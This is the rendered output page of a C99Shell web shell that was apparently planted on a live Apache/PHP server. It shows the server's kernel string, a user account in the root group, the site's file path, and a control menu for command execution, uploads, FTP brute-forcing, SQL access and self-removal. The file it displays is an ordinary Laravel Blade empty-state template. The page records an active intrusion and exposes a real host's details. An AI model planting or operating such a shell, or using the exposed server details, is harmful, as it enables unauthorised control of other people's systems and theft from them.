!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/storage/framework/views/   drwxr-xr-x
Free 28.29 GB of 117.98 GB (23.98%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     9d003cc4adc804072900df093e321f27.php (3.34 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    $singuler 
Str::plural($word1);
    
$plural Str::plural($word2);
?>

<?php if($method == 'GET'): ?>
    <div class="empty py-5">
        <div class="empty-img">
            <img src="<?php echo e(asset('backend/image')); ?>/not-found.svg" height="128px" width="208px" alt="">
        </div>
        <h5 class="mt-4"><?php echo e(__('no_results_found')); ?></h5>
        <p class="empty-subtitle text-muted">
            <?php echo e(__('there_is_no')); ?> <?php echo e(strtolower($plural)); ?> <?php echo e(__('found_in_the_page')); ?>

        </p>
        <?php if($route): ?>
            <div class="empty-action">
                <a href="<?php echo e(route($route)); ?>" class="d-flex justify-content-center align-items-center text-center">
                    <button type="button"
                        class="btn btn-primary d-flex justify-content-center align-items-center text-center">
                        <svg xmlns="http://www.w3.org/2000/svg" class="icon" width="24" height="24"
                            viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none"
                            stroke-linecap="round" stroke-linejoin="round">
                            <path stroke="none" d="M0 0h24v24H0z" fill="none"></path>
                            <line x1="12" y1="5" x2="12" y2="19"></line>
                            <line x1="5" y1="12" x2="19" y2="12"></line>
                        </svg>
                        <span class="ms-2"><?php echo e(__('add_your_first')); ?> <?php echo e(strtolower($singuler)); ?></span>
                    </button>
                </a>
            </div>
        <?php endif; ?>
    </div>
<?php else: ?>
    <div class="empty py-5">
        <div class="empty-img">
            <img src="<?php echo e(asset('backend/image')); ?>/not-found.svg" height="128px" width="208px" alt="">
        </div>
        <h5 class="mt-4"><?php echo e(__('no_results_found')); ?></h5>
        <p class="empty-subtitle text-muted">
            <?php echo e(__('there_is_no')); ?> <?php echo e(strtolower($plural)); ?> <?php echo e(__('found_in_the_page')); ?>

        </p>
        <?php if($route): ?>
            <div class="empty-action d-flex">
                <?php if($route !== ''): ?>
                    <form action="<?php echo e(route($route)); ?>" method="POST">
                        <?php echo csrf_field(); ?>
                        <button class="btn btn-primary" type="submit">
                            <svg xmlns="http://www.w3.org/2000/svg" class="icon" width="24" height="24"
                                viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none"
                                stroke-linecap="round" stroke-linejoin="round">
                                <path stroke="none" d="M0 0h24v24H0z" fill="none"></path>
                                <line x1="12" y1="5" x2="12" y2="19"></line>
                                <line x1="5" y1="12" x2="19" y2="12"></line>
                            </svg>
                            <?php echo e(__('add_your_first')); ?> <?php echo e(strtolower($singuler)); ?>

                        </button>
                    </form>
                <?php endif; ?>
            </div>
        <?php endif; ?>
    </div>
<?php endif; ?>
<?php 
/**PATH E:\add listing 8-9-25\addListing\resources\views/components/not-found.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--